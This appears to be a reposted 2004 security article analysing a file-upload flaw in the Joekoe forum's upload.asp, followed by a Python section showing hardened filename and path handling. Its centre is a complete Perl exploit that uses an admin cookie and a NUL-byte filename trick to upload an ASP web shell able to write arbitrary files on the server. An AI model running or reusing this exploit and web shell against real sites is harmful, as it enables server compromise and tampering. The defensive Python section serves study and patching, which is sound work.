
A brief analysis of the Joekoe forum upload.asp file

2004-9-29 20:05 | Submitted by: security


Disclaimer: This site is a non-profit, public-interest IT technology education site. This article was reposted by a contributor from a publicly available article on the Internet, and its source is noted at the end of the article. The content and images are copyrighted by the original site or author, and the views expressed do not represent those of this site. If anything has been inadvertently infringed or improperly reposted, please contact us via the link at the bottom right of the site. Thank you for your cooperation.

Author: xiaolu    From: http://666w.com

Preface: Yesterday, browsing the Hacker Defense (黑防) website, I saw that issue 8 of Hacker Defense carries an article titled "Joekoe Forum Hit by a Serious UPfile Vulnerability". Unfortunately I cannot buy Hacker Defense where I live, so I had to analyse it myself. The following is against the free 6.6 version of the Joekoe full-site program.

First, look at the upload.asp code:

<%
dim formname,upload_path,upload_type,upload_size,uup
uup="|article|down|forum|gallery|news|other|product|video|website|"
....
up_name=trim(upload.form("up_name"))
up_text=trim(upload.form("up_text"))
up_path=trim(upload.form("up_path"))
if session("joekoe_online_admin")<>"joekoe_admin" and len(up_name)>2 then up_name=""
if len(up_name)<3 then up_name=up_name&upload_time(now_time)
if int(instr(uup,"|"&up_path&"|"))=0 then up_path="other"
if len(up_path)<3 then up_path="other"
uppath=up_path
if right(upload_path,1)<>"/" then upload_path=upload_path&"/"
up_path=server.mappath(upload_path&up_path)
..
      upfile_name=Right(upfilename,(len(upfilename)-Instr(upfilename,".")))
      upfile_name=lcase(upfile_name)
      if instr(","&upload_type&",",","&upfile_name&",")>0 then
        upfile_name2=upfile_name
        upfile_name=up_name&"."&upfile_name
        upfile.SaveAs up_path&upfile_name
..
      else
        uptemp="<font class=red_2>上传失败</font>:文件类型只能为:"&replace(upload_type,"|","、")&"等格式) "&go_back
      end if
...
Look at the submitted variables: up_name, up_path, up_text and upfile_name.

First up_path, that is, this line:

if int(instr(uup,"|"&up_path&"|"))=0 then up_path="other"

As long as the value of up_path is not contained in uup, i.e. is not one of article, down, forum, gallery, news, other, product, video or website, up_path is replaced by the "other" directory, so there is nothing for us to do here.

Next upfile_name, the file extension:

upfile_name=Right(upfilename,(len(upfilename)-Instr(upfilename,".")))

This filtering is rather strict: the filename may effectively contain only a single "." character. A filename such as asp.asp.gif is also treated as illegal, because the code takes everything from the first "." to the end of the string as the extension. Give up on this one.

It is obvious from the code that up_text is of no use to us. That leaves only up_name:

if session("joekoe_online_admin")<>"joekoe_admin" and len(up_name)>2 then up_name=""
if len(up_name)<3 then up_name=up_name&upload_time(now_time)

If we have not logged into the admin backend, i.e. session("joekoe_online_admin")<>"joekoe_admin", then as soon as up_name is longer than 2 characters it is cleared to an empty string. Depressing. But when session("joekoe_online_admin")="joekoe_admin" it can be used. The exploit program is as follows (an admin cookie is required):

#!/usr/bin/perl
$| = 1;
use Socket;
$host = "10.0.0.1";
$port = "80";
$str = "-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_path\"\r\n".
"\r\n".
"gallery\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_name\"\r\n".
"\r\n".
"p.asp\0\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_text\"\r\n".
"\r\n".
"spic\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"file_name1\"; filename=\"F:\\tools\\sql\\getwebs\\p.gif\"\r\n".
"Content-Type: text/plain\r\n".
"\r\n".
"<%dim objFSO%>\r\n".
"<%dim fdata%>\r\n".
"<%dim objCountFile%>\r\n".
"<%on error resume next%>\r\n".
"<%Set objFSO = Server.CreateObject(\"Scripting.FileSystemObject\")%>\r\n".
"<%if Trim(request(\"syfdpath\"))<>\"\" then%>\r\n".
"<%fdata = request(\"cyfddata\")%>\r\n".
"<%Set objCountFile=objFSO.CreateTextFile(request(\"syfdpath\"),True)%>\r\n".
"<%objCountFile.Write fdata%>\r\n".
"<%if err =0 then%>\r\n".
"<%response.write \"<font color=red>save Success!</font>\"%>\r\n".
"<%else%>\r\n".
"<%response.write \"<font color=red>Save UnSuccess!</font>\"%>\r\n".
"<%end if%>\r\n".
"<%err.clear%>\r\n".
"<%end if%>\r\n".
"<%objCountFile.Close%>\r\n".
"<%Set objCountFile=Nothing%>\r\n".
"<%Set objFSO = Nothing%>\r\n".
"<%=server.mappath(Request.ServerVariables(\"SCRIPT_NAME\"))%>\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"submit\"\r\n".
"\r\n".
"点击上传\r\n".
"-----------------------------7d41869a401aa\r\n".
"\r\n";
print $str;
$len=length($str);
$req ="POST /jj/upload.asp?action=upfile HTTP/1.0\r\n".
#"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n".
"Referer: http://10.0.0.1/jj/upload.asp?uppath=gallery&upname=gs200483164242&uptext=spic\r\n".
#"Accept-Language: zh-cn\r\n".
"Content-Type: multipart/form-data; boundary=---------------------------7d41869a401aa\r\n".
#"Accept-Encoding: gzip, deflate\r\n".
#"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.5); .NET CLR 1.1.4322)\r\n".
"Host: 10.0.0.1\r\n".
"Content-Length: $len\r\n".
#"Connection: Keep-Alive\r\n".
#"Cache-Control: no-cache\r\n".
"Cookie: ASPSESSIONIDQAQQRCTQ=DOKDHBIALDIDGJFJMCMMIBFJ; joekoe%5Fonline=login%5Fpassword=dd15f89d35c36afb&guest%5Fname=&login%5Fusername=joekoe&counters=yes\r\n".
"\r\n".
"$str";
print $req;
@res = sendraw($req);
print @res;
#Hmm...Maybe you can send it by other way

sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems\n");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        select(S);
        $| = 1;
        print $req;
        my @res = <S>;
        select(STDOUT);
        close(S);
        return @res;
    }
    else {
        die("Can't connect...\n");
    }
}

Afterword: extremely depressed...... Can someone show me the Hacker Defense article?
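The two weak points the analysis identifies, the extension being taken from the first dot and a client-supplied up_name that may carry an embedded NUL (the p.asp\0 in the request above), are easiest to see side by side in code. The following Python is an added example written for this page, not Joekoe's code and not a port of the ASP shown above: vulnerable_name reproduces the quoted upload.asp naming logic, as_c_string simulates the truncation a NUL-terminated filesystem API applies to such a name, and safe_name / resolve_upload_path show the defensive version (basename only, extension from the last dot, allowlisted stem, final path confined to the upload root). The allowlists, directory names and function names are my own assumptions; the real upload_type value is read from the Joekoe configuration and is not shown on the page.

```python
import os
import re
from typing import Optional

# Constructed allowlists for this example (assumptions, not Joekoe's config).
ALLOWED_EXT = {"gif", "jpg", "jpeg", "png", "zip", "rar"}
ALLOWED_DIRS = {"article", "down", "forum", "gallery", "news", "other",
                "product", "video", "website"}
# Only a plain stem is accepted from the client: no dots, slashes, NULs or
# other control characters, so the extension we append is the only one.
SAFE_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")


def vulnerable_name(up_name: str, upfilename: str) -> Optional[str]:
    """Python rendering of the upload.asp logic quoted in the article:
    the extension is everything after the FIRST dot, and the stored name is
    up_name & "." & ext, with up_name taken as-is for an admin session."""
    pos = upfilename.find(".")
    if pos < 0:
        return None                        # Instr() = 0: no usable extension
    ext = upfilename[pos + 1:].lower()     # "p.asp.gif" -> "asp.gif" -> rejected
    if ext not in ALLOWED_EXT:
        return None
    return f"{up_name}.{ext}"              # a NUL inside up_name survives here


def as_c_string(name: str) -> str:
    """What a NUL-terminated filesystem API sees for a name with an embedded
    NUL: everything after the first \\0 is dropped. Python itself refuses
    such paths with ValueError; this simulates the classic-ASP/Win32 case."""
    return name.split("\0", 1)[0]


def safe_name(up_name: str, upfilename: str) -> Optional[str]:
    """Hardened version: take the basename of the client path, derive the
    extension from the LAST dot, allowlist it, and require the client-supplied
    stem to match SAFE_STEM (which also rejects embedded NULs)."""
    base = os.path.basename(upfilename.replace("\\", "/"))
    stem, dot, ext = base.rpartition(".")
    if not dot or not stem:
        return None
    ext = ext.lower()
    if ext not in ALLOWED_EXT:
        return None
    if not SAFE_STEM.fullmatch(up_name):
        return None
    return f"{up_name}.{ext}"


def resolve_upload_path(root: str, up_path: str, filename: str) -> Optional[str]:
    """Map up_path onto the fixed directory allowlist (as upload.asp does),
    then verify the final path still lies under the upload root; None if not."""
    sub = up_path if up_path in ALLOWED_DIRS else "other"
    root_abs = os.path.abspath(root)
    full = os.path.abspath(os.path.join(root_abs, sub, filename))
    if os.path.commonpath([root_abs, full]) != root_abs:
        return None
    return full


if __name__ == "__main__":
    # Constructed inputs mirroring the article's request: up_name "p.asp\0",
    # uploaded file named p.gif, target directory gallery.
    bad = vulnerable_name("p.asp\0", "p.gif")
    print(repr(bad), "->", as_c_string(bad))            # 'p.asp\x00.gif' -> p.asp
    print(safe_name("p.asp\0", "p.gif"))                # None: NUL/dot rejected
    print(safe_name("photo_1", r"F:\tools\p.asp.gif"))  # photo_1.gif
    print(resolve_upload_path("/srv/upload", "gallery", "photo_1.gif"))
    print(resolve_upload_path("/srv/upload", "other", "../../passwd"))  # None
```

The strongest fix is the one upload.asp already applies to non-admin users: ignore the client-supplied name altogether and generate one server-side (the page's code uses upload_time(now_time) for that), so that the extension check is the only place where client input influences the stored filename. Note that Python raises ValueError for a path containing "\0", which is why the truncation is simulated rather than exercised against the real filesystem.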





